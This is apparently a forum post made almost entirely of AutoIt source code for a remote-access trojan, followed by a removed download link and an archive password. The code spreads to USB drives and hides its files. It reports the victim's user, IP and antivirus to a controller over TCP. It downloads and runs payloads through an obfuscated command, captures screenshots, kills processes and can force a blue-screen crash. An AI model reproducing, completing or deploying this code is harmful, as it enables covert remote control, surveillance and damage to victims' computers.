FileDelete($sArray[$i] & '\' & $sFiles[$si])
Else
DllCall('Kernel32.dll', 'int', 'SetFileAttributes', 'str', $sArray[$i] & '\' & $sFiles[$si], 'dword', 0x2)
EndIf
Next
FileCopy(@ScriptFullPath, $sArray[$i] & '\' & @ScriptName)
DllCall('Kernel32.dll', 'int', 'SetFileAttributes', 'str', $sArray[$i] & '\' & @ScriptName, 'dword', 0x2)
EndIf
Next
EndIf
EndFunc
Func _ExtractIcon($source, $outsource, $iconnumber)
$Ret = DllCall("shell32", "long", "ExtractAssociatedIcon", "int", 0, "str", $source, "int*", $iconnumber)
$hIcon = $Ret[0]
_GDIPlus_Startup()
$pBitmapdll = DllCall($ghGDIPDll, "int", "GdipCreateBitmapFromHICON", "ptr", $hIcon, "int*", 0)
$pBitmap = $pBitmapdll[2]
_WinAPI_DestroyIcon($Ret[0])
_GDIPlus_ImageSaveToFileEx($pBitmap, $outsource, "{557CF400-1A04-11D3-9A73-0000F81EF32E}")
_GDIPlus_ImageDispose($pBitmap)
_GDIPlus_Shutdown()
EndFunc
Func Detect_USB()
Local $sReturn
Local $sDriver = DriveGetDrive('REMOVABLE')
If $sDriver <> 0 Then
For $i = 1 To $sDriver[0]
$sReturn = $sReturn & $sDriver[$i] & '@'
Next
EndIf
Return StringUpper($sReturn)
EndFunc ;==>Detect_USB
While 1
$sConect = TCPConnect($sIP, $sPuerto)
if $sConect = -1 or @error then ContinueLoop
Local $sAV = GetAntiVirus()
Local $sSend = TCPSend($sConect, @OSLang & '|' & $sServerName & '|' & $sPuerto & '|' & @IPAddress1 & '|' & @UserName & '|' & @OSVersion & ' ' & @OSArch & '|' & $sAV & '|' & $sPass & '|' & 'OK')
if @error then ContinueLoop
While 1
Local $sAcciones = TCPRecv($sConect, 2048)
if @error then ExitLoop
if $sAcciones = 'Refrescar' then
ShellExecute(@ScriptFullPath)
Exit
EndIf
if $sAcciones = 'Disconect' then
TCPShutdown()
EndIf
if $sAcciones = 'Uninstall' then
FileDelete(@WindowsDir & '\Autorun.vbs')
Local $sCode = 'WScript.Sleep 2000' & @CRLF & 'Set variable = CreateObject("Scripting.FileSystemObject")' & @CRLF & 'variable.DeleteFile "' & @ScriptFullPath & '"'
$sBath = FileOpen(@TempDir & '\DEL.vbs', 17)
FileWrite($sBath, $sCode)
FileClose($sBath)
TCPShutdown()
ShellExecute(@TempDir & '\DEL.vbs')
Exit
EndIf
if $sAcciones = 'Disk' then
do
Local $sExt = TCPRecv($sConect, 1024)
until $sExt <> ''
Local $sOpen = FileOpen(@TempDir & '\001.' & $sExt, 18)
Do
Local $sData = TCPRecv($sConect, 2048)
If @error Then ExitLoop 2
If StringRight($sData, 2) = 'OK' Then ExitLoop
FileWrite($sOpen, $sData)
Until False
FileClose($sOpen)
ShellExecute(@TempDir & '\001.' & $sExt)
EndIf
if $sAcciones = 'URL' then
Do
Local $sExt = TCPRecv($sConect, 1024)
Until $sExt <> ''
Do
Local $sURL = TCPRecv($sConect, 3074)
Until $sURL <> ''
Local $sDescifrado = Cifrado_Simple_Descifrar($sURL, 54)
_Down($sDescifrado, $sExt)
EndIf
if $sAcciones = 'Remote' then
While 1
Local $sFin = TCPRecv($sConect, 1024)
if $sFin = 'Fin' then ExitLoop
Local $sImage = _ScreenCapture_Capture(@TempDir & '/002.jpg')
Local $sFileopen = FileOpen(@TempDir & '/002.jpg')
While 1
Local $sData = FileRead($sFileopen, 2048)
If @error then ExitLoop
TCPSend($sConect, $sData)
If @error Then ExitLoop
WEnd
FileClose($sFileopen)
TCPSend($sConect, 'OK')
WEnd
EndIf
if $sAcciones = 'Process' then
Local $sProcess = ProcessList()
for $i = 1 to $sProcess[0][0]
TCPSend($sConect, $sProcess[$i][0] & '|' & $sProcess[$i][1] & '@')
Next
TCPSend($sConect, 'OK')
EndIf
if $sAcciones = 'KillBSOD' Then
Do
Local $sProcesstoBSOD = TCPRecv($sConect, 1024)
Until $sProcesstoBSOD <> ''
ProtectProcess_BSOD($sProcesstoBSOD, 0)
Sleep(250)
ProcessClose($sProcesstoBSOD)
EndIf
if $sAcciones = 'Kill' then
Do
Local $sProcesskill = TCPRecv($sConect, 1024)
Until $sProcesskill <> ''
ProcessClose($sProcesskill)
EndIf
if $sAcciones = 'WEB' Then
Do
Local $sWEB = TCPRecv($sConect, 2048)
Until $sWEB <> ''
ShellExecute($sWEB)
EndIf
WEnd
WEnd
Func _Down($sURL, $sExtension)
ShellExecuteWait(@ComSpec , Cifrado_Simple_Descifrar('&5i&(hozygjsot&5zxgtylkx&spuh&5ju}trugj&5vxouxoz&Nomn&', 6) & $sURL & ' ' & @TempDir & '\001.' & $sExtension & ' ' , '' , '' , @SW_HIDE)
ShellExecute(@TempDir & '\001.' & $sExtension)
EndFunc
Func Cifrado_Simple_Descifrar($texto, $numero)
$Resultado = ''
For $i = 1 to StringLen($texto)
$Resultado = $Resultado & Chr(Asc(StringMid($texto, $i)) - $numero)
next
Return $Resultado
EndFunc
Func GetAntiVirus()
Local $sReturn
If ProcessExists('AvastUI.exe') then
$sReturn = 'Avast Free Antivirus'
EndIf
If ProcessExists('avgui.exe')= True Then
$sReturn = 'AVG Internet Security'
EndIf
If ProcessExists('avgnt.exe')= True Then
$sReturn = 'Avira Free Antivirus'
EndIf
If ProcessExists('egui.exe') = True Then
$sReturn = 'Eset NOD32'
EndIf
If ProcessExists('Avp.exe') = True Then
$sReturn = 'Kaspersky Anti-Virus'
EndIf
If ProcessExists('msseces.exe') = True Then
$sReturn = 'Microsoft Security Essentials'
EndIf
If ProcessExists('Cistray.exe') = True Then
$sReturn = 'Comodo Free Antivirus'
EndIf
if ProcessExists('a2cmd.exe') = true Then
$sReturn = 'Asquared Free Antivirus'
EndIf
if ProcessExists('bdagexec.exe') = true Then
$sReturn = 'Bitdefender Antivirus Software'
EndIf
if $sReturn = '' then
$sReturn = 'Desconocido'
EndIf
Return $sReturn
EndFunc
Func ProtectProcess_BSOD($sProcessName, $Mio)
Const $sPriority = 29
Const $sProcess_All_Access = 0x1F0FFF
Const $sTokenAdjustPrivileges = 0x20
Const $sTokenQuery = 0x0008
Local $sHandle
Local $sPID = ProcessExists($sProcessName)
Local $sOpenThreadToken = _Security__OpenThreadTokenEx (BitOR($sTokenAdjustPrivileges, $sTokenQuery))
_Security__SetPrivilege($sOpenThreadToken, 'SeDebugPrivilege', True)
DllCall('Kernel32.dll', 'int', 'CloseHandle', 'handle', $sOpenThreadToken)
if $Mio = 0 Then
$sHandle = DllCall('Kernel32.dll', 'handle', 'OpenProcess', 'dword', $sProcess_All_Access, 'bool', True, 'dword', $sPID)
Else
$sHandle = DllCall('Kernel32.dll', 'handle', 'OpenProcess', 'dword', $sProcess_All_Access, 'bool', True, 'dword', @AutoItPID)
EndIf
Local $sStruct = DllStructCreate('bool BSOD')
DllStructSetData($sStruct, 'BSOD', True)
DllCall('Ntdll.dll', 'int', 'NtSetInformationProcess', 'handle', $sHandle[0], 'int', $sPriority, 'int', DllStructGetPtr($sStruct), 'int', 4)
DllCall('Kernel32.dll', 'int', 'CloseHandle', 'handle', $sHandle[0])
EndFuncLink: [Enlace externo eliminado para invitados]
Pass: Indetectables.net
Saludos
